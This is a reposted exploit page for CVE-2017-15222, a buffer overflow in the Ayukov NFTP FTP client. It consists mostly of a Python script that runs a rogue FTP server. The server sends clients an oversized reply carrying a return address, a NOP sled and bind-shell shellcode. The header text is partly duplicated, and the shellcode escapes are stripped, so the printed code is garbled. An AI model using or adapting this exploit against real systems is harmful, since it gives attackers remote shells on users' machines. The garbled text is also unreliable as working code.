Ayukov NFTP FTP Client 2.0 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 229

# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp:/ # Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222

# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32USER32.dll)
# badchars: 'x00x0Ax0Dx40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b 'x00x0Ax0D' -f python

import socket

IP = '192.168.43.28'
port = 21

buf = ""
buf += "xbbx04x8bxfcxf1xd9xc4xd9x74x24xf4x5ax29"
buf += "xc9xb1x53x83xeaxfcx31x5ax0ex03x5ex85x1e"
buf += "x04xa2x71x5cxe7x5ax82x01x61xbfxb3x01x15"
buf += "xb4xe4xb1x5dx98x08x39x33x08x9ax4fx9cx3f"
buf += "x2bxe5xfax0exacx56x3ex11x2exa5x13xf1x0f"
buf += "x66x66xf0x48x9bx8bxa0x01xd7x3ex54x25xad"
buf += "x82xdfx75x23x83x3cxcdx42xa2x93x45x1dx64"
buf += "x12x89x15x2dx0cxcex10xe7xa7x24xeexf6x61"
buf += "x75x0fx54x4cxb9xe2xa4x89x7ex1dxd3xe3x7c"
buf += "xa0xe4x30xfex7ex60xa2x58xf4xd2x0ex58xd9"
buf += "x85xc5x56x96xc2x81x7ax29x06xbax87xa2xa9"
buf += "x6cx0exf0x8dxa8x4axa2xacxe9x36x05xd0xe9"
buf += "x98xfax74x62x34xeex04x29x51xc3x24xd1xa1"
buf += "x4bx3exa2x93xd4x94x2cx98x9dx32xabxdfxb7"
buf += "x83x23x1ex38xf4x6axe5x6cxa4x04xccx0cx2f"
buf += "xd4xf1xd8xdaxdcx54xb3xf8x21x26x63xbdx89"
buf += "xcfx69x32xf6xf0x91x98x9fx99x6fx23x8ex05"
buf += "xf9xc5xdaxa5xafx5ex72x04x94x56xe5x77xfe"
buf += "xcex81x30xe8xc9xaexc0x3ex7ex38x4bx2dxba"
buf += "x59x4cx78xeax0exdbxf6x7bx7dx7dx06x56x15"
buf += "x1ex95x3dxe5x69x86xe9xb2x3ex78xe0x56xd3"
buf += "x23x5ax44x2exb5xa5xccxf5x06x2bxcdx78x32"
buf += "x0fxddx44xbbx0bx89x18xeaxc5x67xdfx44xa4"
buf += "xd1x89x3bx6exb5x4cx70xb1xc3x50x5dx47x2b"
buf += "xe0x08x1ex54xcdxdcx96x2dx33x7dx58xe4xf7"
buf += "x8dx13xa4x5ex06xfax3dxe3x4bxfdxe8x20x72"
buf += "x7ex18xd9x81x9ex69xdcxcex18x82xacx5fxcd"
buf += "xa4x03x5fxc4"

evil = "A"*4116 + "x10xb3x45x7e" + "x90"*100 + buf + "D"*10425

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, port))
s.listen(20)
print("[i] FTP Server started on port: "+str(port)+" ")
except:
print("[!] Failed to bind the server to port: "+str(port)+" ")

while True:
conn, addr = s.accept()
conn.send('220 Welcome!' + ' ')
print conn.recv(1024)
conn.send('331 OK. ')
print conn.recv(1024)
conn.send('230 OK. ')
print conn.recv(1024)
conn.send(evil + ' ')
print conn.recv(1024)
conn.send('257' + ' ')